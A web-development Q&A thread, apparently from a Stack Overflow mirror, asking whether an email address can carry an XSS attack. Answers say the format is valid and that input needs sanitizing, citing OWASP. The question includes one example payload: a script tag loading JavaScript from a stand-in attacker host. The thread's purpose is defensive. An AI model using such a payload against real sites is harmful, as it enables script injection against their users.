Login/Register
Are XSS attacks possible through email addresses?
Asked Answered
Solved securityemailxssemail-formats
I

1

8

I wonder whether an email address can be used for XSS attacks.

Let's suppose there is a website where one can register and gives his email address. If one wants to attack the given website, he or she might create an email address, such as this one:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

and then use this email address to attack the website.

Is quote or script tag allowed in an email address?

Insurer answered 5/7, 2013 at 3:53 Comment(2)
It depends upon the application in question how sanitizes user input. Yes, an email address in your case is nothing but a user input. Depending upon how you parse and display it, you might be vulnerable.Acnode
But my question is: Is this type of input valid? Can one have such email address or not? If one can have such an email address, then we have to pay attention on each point where we show it. If not, then we just write a validator that doesn't accept such email addresses.Insurer
A
8

The email address in your example appears valid. The only character that is unusual is the quote " -- rest others are valid.

Wikipedia suggests that the email address you specified is valid.

You need to ensure that arbitrary user input is sanitized before being rendered.

To begin with, you might want to refer to information about XSS and prevention available at OWASP.

Acnode answered 5/7, 2013 at 4:24 Comment(3)
+1, thank you for this nice answer. I will wait for other answers too to see the truth. If they cannot convince me that the email address format is invalid, then I will accept your answer.Insurer
Unfortunately OWASP links are broken!Bayles
prevention cheat sheet is here cheatsheetseries.owasp.org/cheatsheets/…Reprimand

© 2022 - 2024 — McMap. All rights reserved.